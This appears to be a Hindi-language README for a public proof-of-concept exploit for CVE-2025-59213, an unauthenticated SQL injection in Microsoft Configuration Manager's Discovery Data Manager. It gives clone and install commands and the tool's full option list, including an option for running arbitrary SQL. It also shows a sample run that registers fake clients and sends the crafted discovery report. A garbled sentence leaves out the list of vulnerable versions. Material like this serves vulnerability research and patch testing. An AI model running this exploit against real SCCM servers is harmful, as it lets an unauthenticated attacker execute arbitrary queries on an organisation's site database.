
Microsoft Configuration Manager (SCCM) 2503 के लिए बिना प्रमाणीकरण के SQL इंजेक्शन शोषण, जो Discovery Data Manager DDM विधि के माध्यम से साइट डेटाबेस पर मनमानी SQL निष्पादन को सक्षम करता है।
यह स्क्रिप्ट CVE-2025-59213 भेद्यता का शोषण करती है, जो एक बिना प्रमाणीकरण वाले हमलावर को, जिसके पास प्रबंधन बिंदु (Management Point) तक नेटवर्क पहुंच है, डिस्कवरी डेटा प्रबंधक (DDM) DuplicateAMTMachineRecord विधि में SQL इंजेक्शन दोष का दुरुपयोग करके साइट डेटाबेस पर मनमाना SQL क्वेरी निष्पादित करने की अनुमति देती है, जहां दो ग्राहकों को विरोधाभासी हार्डवेयर आईडी के साथ मर्ज करने के दौरान अनएस्केप किए गए Hardware_ID0 फ़ील्ड को अनुचित रूप से संभाला जाता है।
जब KB34503790 अनुपस्थित हो, तो निम्नलिखित Microsoft Configuration Manager संस्करण सभी असुरक्षित हैं:
--altauth स्विच का उपयोग करें ()--no-clean स्विच का उपयोग न किया गया हो या कोई पैच सफाई को ट्रिगर होने से रोकता हो।आप रिपॉजिटरी को क्लोन करके और निर्भरताएँ स्थापित करके इंस्टॉल कर सकते हैं।
$ git clone https://github.com/synacktiv/CVE-2025-59213
$ cd CVE-2025-59213
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt
$ python3 CVE-2025-59213.py -h
usage: CVE-2025-59213.py [-h] -t TARGET [-sk SIGKEY] [-k KEY] [-c CERT] [-v] -cn CLIENT_NAME [-rs REGISTRATION_SLEEP] [-a] -sql SQL [-nc]
CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection
options:
-h, --help show this help message and exit
-t, --target TARGET Target (http://sccm-mp.local/)
-sk, --sigkey SIGKEY SMS signature key (automatically generated if omitted)
-k, --key KEY Private key file for mTLS
-c, --cert CERT Certificate file for mTLS
-v, --verbose Verbose output, print requests
-cn, --client-name CLIENT_NAME
Name of the client that will be created in SCCM
-rs, --registration-sleep REGISTRATION_SLEEP
The amount of time, in seconds, that should be waited after registrating a new device (10 seconds by default)
-a, --altauth Use the MP's alternate authentication endpoint
-sql SQL Query to execute through the SQL injection
-nc, --no-clean Do not automatically clean the registred devices
$ python3 ./CVE-2025-59213.py -t https://cmc.corp.local --altauth -cn FAKE_CLIENT_NAME -sql 'select 1'
[+] Generated new signing key, saved to /tmp/sccm_poc.key
[+] CcmMessage : ID={D731ED0A-4474-497D-A191-D8948E17ECBF}
[+] Got SMSID = GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F for new client FAKE_CLIENT_NAME
[+] CcmMessage : ID={23EEE9B8-7971-4560-9D18-9328C5DF0C2E}
[+] Got SMSID = GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69 for new client FAKE_CLIENT_NAME
[+] Sending DDR report: SMSID=GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F OLDSMSID=GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69
[+] CcmMessage : ID={88B6BEBD-1F99-4BD2-8786-6BD3C6CFF299}
[+] CcmMessage : adding clientauth
[+] CcmMessage : adding attachment
[+] DDR report sent successfully